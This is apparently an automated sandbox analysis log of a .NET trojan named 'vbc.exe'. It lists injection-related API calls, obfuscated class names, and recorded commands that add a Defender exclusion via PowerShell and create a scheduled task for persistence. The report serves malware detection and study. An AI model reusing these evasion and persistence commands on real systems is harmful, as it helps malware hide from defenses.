          Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_04FCD9C0
          Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_04FCEDB0
          Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_04FCEE51
          Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_04FC4F49
          Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_04FCF0C2
          Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_04FC9CA8
          Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_04FC9C98
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_00401030
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0041C130
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0041C9A5
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0041BABE
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_00408C7B
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0041C4E6
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_00408C80
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_00402D87
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_00402D90
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_00402FB0
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F0D20
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017FF900
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01814120
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C1D55
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0180B090
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B1002
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0182EBB0
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01816E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02B5C9A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02B42FB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02B48C80
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02B48C7B
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02B42D90
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02B42D87
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_004185E0 NtCreateFile,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_00418690 NtReadFile,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_00418710 NtClose,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_004187C0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_004187C2 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018399A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018395D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018398F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018397A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018396E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018399D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018395F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0183AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839560 NtWriteFile,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018398A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0183B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0183A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0183A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839760 NtOpenProcess,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0183A770 NtOpenThread,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018396D0 NtCreateKey,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839A10 NtQuerySection,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02B58690 NtReadFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02B587C0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02B58710 NtClose,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02B585E0 NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02B587C2 NtAllocateVirtualMemory,
          Source: vbc.exeBinary or memory string: OriginalFilename vs vbc.exe
          Source: vbc.exe, 00000000.00000002.263973483.0000000000D39000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs vbc.exe
          Source: vbc.exe, 00000000.00000002.267729856.0000000005CB0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs vbc.exe
          Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameHResult.dll6 vs vbc.exe
          Source: vbc.exeBinary or memory string: OriginalFilename vs vbc.exe
          Source: vbc.exe, 00000008.00000002.344710455.0000000001A7F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs vbc.exe
          Source: vbc.exe, 00000008.00000002.344023750.000000000139A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs vbc.exe
          Source: vbc.exeBinary or memory string: OriginalFilenameICollecti.exeB vs vbc.exe
          Source: vbc.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: uZlkYhlkeLeaKC.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\vbc.exeFile read: C:\Users\user\Desktop\vbc.exeJump to behavior
          Source: vbc.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\vbc.exe "C:\Users\user\Desktop\vbc.exe"
          Source: C:\Users\user\Desktop\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\vbc.exeProcess created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Users\user\Desktop\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe
          Source: C:\Users\user\Desktop\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp
          Source: C:\Users\user\Desktop\vbc.exeProcess created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe
          Source: C:\Users\user\Desktop\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\vbc.exeFile created: C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exeJump to behavior
          Source: C:\Users\user\Desktop\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\tmpAA68.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/8@14/6
          Source: C:\Users\user\Desktop\vbc.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: vbc.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: vbc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: vbc.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe
          Source: Binary string: help.pdbGCTL source: vbc.exe, 00000008.00000002.344023750.000000000139A000.00000004.00000020.sdmp
          Source: Binary string: help.pdb source: vbc.exe, 00000008.00000002.344023750.000000000139A000.00000004.00000020.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpacker
          Source: vbc.exe, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs.Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: uZlkYhlkeLeaKC.exe.0.dr, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs.Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.vbc.exe.6f0000.0.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs.Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.vbc.exe.6f0000.0.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs.Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.vbc.exe.d10000.5.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs.Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.vbc.exe.d10000.2.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs.Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.vbc.exe.d10000.7.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs.Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.vbc.exe.d10000.0.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs.Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.vbc.exe.d10000.9.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs.Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.vbc.exe.d10000.3.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs.Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.2.vbc.exe.d10000.1.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs.Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.vbc.exe.d10000.1.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs.Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_006F7A49 push es; ret
          Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_006F72F5 push cs; retf
          Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_006F8699 push es; ret
          Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_006F7151 push cs; retf
          Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_006F87AD push es; ret
          Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_006F879B push es; ret
          Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_04FC95E5 push eax; retf
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0041B832 push eax; ret
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0041B83B push eax; ret
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0041B89C push eax; ret
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_00406907 push 00000060h; retf
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0041A11B push ecx; ret
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0041A3BA pushfd ; ret
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_004154EE pushad ; retf
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_00419E43 push 0000007Eh; iretd
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0040EFC6 push cs; ret
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0041B7E5 push eax; ret
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_00D17151 push cs; retf
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_00D172F5 push cs; retf
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_00D17A49 push es; ret
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_00D18699 push es; ret
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_00D1879B push es; ret
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_00D187AD push es; ret
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0184D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02B5A3BA pushfd ; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02B5B89C push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02B5B832 push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02B5B83B push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02B5A11B push ecx; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02B46907 push 00000060h; retf
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02B59E43 push 0000007Eh; iretd
          Source: initial sampleStatic PE information: section name: .text entropy: 7.9203967863
          Source: initial sampleStatic PE information: section name: .text entropy: 7.9203967863
          Source: vbc.exe, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.csHigh entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
          Source: vbc.exe, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.csHigh entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
          Source: vbc.exe, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.csHigh entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
          Source: vbc.exe, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.csHigh entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
          Source: vbc.exe, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.csHigh entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
          Source: vbc.exe, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.csHigh entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
          Source: vbc.exe, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.csHigh entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
          Source: vbc.exe, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.csHigh entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
          Source: uZlkYhlkeLeaKC.exe.0.dr, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.csHigh entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
          Source: uZlkYhlkeLeaKC.exe.0.dr, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.csHigh entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
          Source: uZlkYhlkeLeaKC.exe.0.dr, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.csHigh entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
          Source: uZlkYhlkeLeaKC.exe.0.dr, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.csHigh entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
          Source: uZlkYhlkeLeaKC.exe.0.dr, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.csHigh entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
          Source: uZlkYhlkeLeaKC.exe.0.dr, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.csHigh entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
          Source: uZlkYhlkeLeaKC.exe.0.dr, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.csHigh entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
          Source: uZlkYhlkeLeaKC.exe.0.dr, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.csHigh entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
          Source: 0.2.vbc.exe.6f0000.0.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.csHigh entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
          Source: 0.2.vbc.exe.6f0000.0.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.csHigh entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
          Source: 0.2.vbc.exe.6f0000.0.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.csHigh entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
          Source: 0.2.vbc.exe.6f0000.0.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.csHigh entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
          Source: 0.2.vbc.exe.6f0000.0.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.csHigh entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
          Source: 0.2.vbc.exe.6f0000.0.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.csHigh entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
          Source: 0.2.vbc.exe.6f0000.0.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.csHigh entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
          Source: 0.2.vbc.exe.6f0000.0.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.csHigh entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
          Source: 0.0.vbc.exe.6f0000.0.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.csHigh entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
          Source: 0.0.vbc.exe.6f0000.0.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.csHigh entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
          Source: 0.0.vbc.exe.6f0000.0.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.csHigh entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
